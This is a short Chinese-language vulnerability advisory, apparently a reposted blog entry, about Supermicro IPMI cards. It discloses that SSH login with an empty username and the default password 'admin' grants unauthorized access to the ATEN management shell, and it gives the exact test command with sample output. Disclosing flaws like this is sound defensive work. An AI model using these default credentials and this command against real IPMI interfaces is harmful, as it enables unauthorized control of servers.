危害
远程攻击者可以利用漏洞未授权访问应用设备。
攻击所需条件
攻击者必须访问Supermicro IPMI。
漏洞信息
Supermicro IPMI是超微产品中的IPMI卡,可远端开机,进入BIOS等进行系统控制。
Supermicro IPMI存在两个管理账户,用于WEB接口访问:
"ADMIN"
"Anonymous"
官方文件仅告诉用户更改"ADMIN"账户密码。
通过SSH指定空用户名,默认密码使用小写的"admin"可绕过限制登录系统。
测试方法
==
$ ssh -l "" -o PreferredAuthentications=password,keyboard-interactive
xx.xx.xx.xx
@xx.xx.xx.xx's password:
Auth User/Pass with PS...pass.
ATEN SMASH-CLP System Management Shell, version 1.00
Copyright (c) 2008-2009 by ATEN International CO., Ltd.
All Rights Reserved
->
==
漏洞消息链接
http://packetstormsecurity.org/files/view/105730/supermicroipmi-default.txt漏洞消息标题
Supermicro IPMI Default Accounts
参考信息
Nessus plugins :51418 51369
22/tcp open ssh Dropbear sshd 0.52 (protocol 2.0)
阅读(3539) | 评论(0) | 转发(0) |